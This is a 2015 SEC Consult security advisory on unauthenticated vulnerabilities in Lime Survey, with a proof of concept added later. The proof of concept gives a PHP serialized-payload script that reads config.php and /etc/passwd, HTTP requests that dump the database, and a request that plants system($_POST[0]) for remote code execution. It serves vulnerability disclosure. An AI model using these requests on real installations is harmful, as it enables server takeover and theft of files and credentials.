SEC Consult Vulnerability Lab Security Advisory < 20151022-0 >
=======================================================================
title: Multiple critical vulnerabilities
product: Lime Survey
vulnerable version: 2.05 up to 2.06+ Build 151014
fixed version: 2.06+ Build 151016
CVE number:
impact: critical
homepage: www.limesurvey.org
found: 2015-10-12
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich - Bangkok
=======================================================================
Vendor description:
-------------------
Lime Survey allows users to quickly create intuitive, powerful,
online question-and-answer surveys that can work for tens to thousands
of participants without much effort. The survey software itself is
self-guiding for the respondents who are participating.
Lime Survey has surpassed 1,500,000 downloads and is used by a huge number of
private persons, big companies, academic facilities and governmental
institutions around the world.
URL: www.limesurvey.org/en/about-limesurvey/references
Business recommendation:
------------------------
By combining the vulnerabilities documented in this advisory,
unauthenticated remote attackers can completely compromise Lime
Survey application server.
- Arbitrary local files can be downloaded
- Entire Lime Survey database can be accessed
- Arbitrary PHP code can be executed
SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.
Vulnerability overview/description:
-----------------------------------
Due to the lack of function level access control many administrative
functions in Lime Survey can be accessed by remote attackers without
prior authentication.
Moreover, the application did not validate some of user input properly.
Unauthenticated attackers can pass specially crafted data to the entry points
result in following vulnerabilities.
1. Unauthenticated local file disclosure
An attacker can craft a malicious PHP serialized string containing a list of
arbitrary files. This list can be sent to the Lime Survey backup feature
for downloading without prior authentication.
Any files accessible with the privileges of the web server user
can be downloaded.
2. Unauthenticated database dump
An attacker can request the database backup feature without authentication.
The whole Lime Survey database can be downloaded including username and
hashed password of the administrator account.
3. Unauthenticated arbitrary remote code execution
An attacker can inject arbitrary PHP code into the application source code
allowing to plant a malicious web backdoor to access underlying web server.
4. Multiple reflective cross-site scripting
The application is prone to multiple reflective cross-site scripting
vulnerabilities.
Proof of concept:
-----------------
The vendor kindly asked SEC Consult to give people enough time to update
their installations.
Because of the high risk vulnerabilities, the proof of concept
section has been removed from this advisory.
Update 2016-09-29: Poc released, see below
1. Unauthenticated local file disclosure
First, generate list of files for PHP serialized payload.
$ cat limesurvey-lfi.php
<?php
$pwn = new stdClass; // dummy class
$pwn->file = '/application/config/config.php';
$pwn2 = new stdClass;
$pwn2->file = '/../../../../../../../../../etc/passwd';
echo base64_encode(serialize([$pwn, $pwn2])); // datasupdateinfo
Then submit the generated value as an unauthenticated request with datasupdateinfo parameter.
HTTP Request:
HTTP Request:
POST /index.php/admin/update/backup HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded
Content-Length: 264
YII_CSRF_TOKEN=x&destinationBuild=x&datasupdateinfo=YToyOntpOjA7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjMwOiIvYXBwbGljYXRpb24vY29uZmlnL2NvbmZpZy5waHAiO31pOjE7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjM4OiIvLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCI7fX0=
HTTP Response:
HTTP/1.1 200 OK
Date: Mon, 12 Oct 2015 19:37:27 GMT
Set-Cookie: PHPSESSID=4fr25208e91ap3ith6beagg9l3; path=/; HttpOnly
[..deducted..]
<h2 class="maintitle">Creating file backup</h2>
<div class="updater-background">
<p class="success " style="text-align: left;">
<strong>File backup created: </strong>
<br/>
/var/www/limesurvey/tmp/LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip<br/>
<a class="btn btn-success" href="http://<host>/tmp/LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip" title="Download this file">Download this file</a>
[..deducted..]
$ unzip -l LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip
Archive: LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip
Length Date Time Name
-------- ---- ---- ----
2345 10-12-15 13:33 application/config/config.php
1148 10-12-15 13:22 ../../../../../../../../../etc/passwd
-------- -------
3493 2 files
2. Unauthenticated database dump
HTTP Request:
POST /index.php/admin/update/step3 HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
YII_CSRF_TOKEN=x
HTTP Response:
HTTP/1.1 200 OK
[..deducted..]
<div class="successtitle"> Creating database backup...</div>
<p class="success">DB backup created: /var/www/limesurvey/tmp/LimeSurvey_database_backup_2015-10-16_00763f2a6579925ae1daf39239e7aa1b.zip</p>
[..deducted..]
Entire Lime Survey database is downloadable via
http:// <host>/tmp/LimeSurvey_database_backup_2015-10-16_00763f2a6579925ae1daf39239e7aa1b.zip
3. Unauthenticated arbitrary remote code execution
HTTP Request:
POST /index.php/admin/update/step4 HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded
YII_CSRF_TOKEN=x&destinationBuild=151014';system($_POST[0]);phpinfo();//&datasupdateinfo=YToxOntpOjA7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjMwOiIvYXBwbGljYXRpb24vY29uZmlnL2NvbmZpZy5waHAiO319&access_token=<ComfortUpdate_Token>
The comfort update server seems to do (int) "151014';system($_POST[0]);phpinfo();//&" => 151014 and return valid .zip update
but the local update write user input string $destinationBuild => "151014';system($_POST[0]);phpinfo();//&" into version.php
Next, just go to any page, for example, the homepage of Lime Survey.
The injected "phpinfo()" will be executed as the result of unauthenticated RCE exploit
due to the fact that "version.php" is automatically included on almost every pages.
4. Multiple reflective cross-site scripting
File: application/views/admin/update/_ajaxVariables.php:23:
File: application/views/admin/update/_ajaxVariables.php:30:
File: application/views/admin/update/_ajaxVariables.php:34: